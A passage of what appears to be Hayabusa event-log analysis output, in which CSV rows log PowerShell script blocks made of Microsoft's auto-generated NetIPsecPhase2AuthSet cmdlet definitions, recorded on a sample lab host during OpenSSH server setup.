$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase2AuthSet' -Alias '*' function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')]",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.561 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,") -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase2AuthSet' -Alias '*' function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase2AuthSet' -Alias '*' function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')]",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.561 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase2AuthSet' -Alias '*' function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 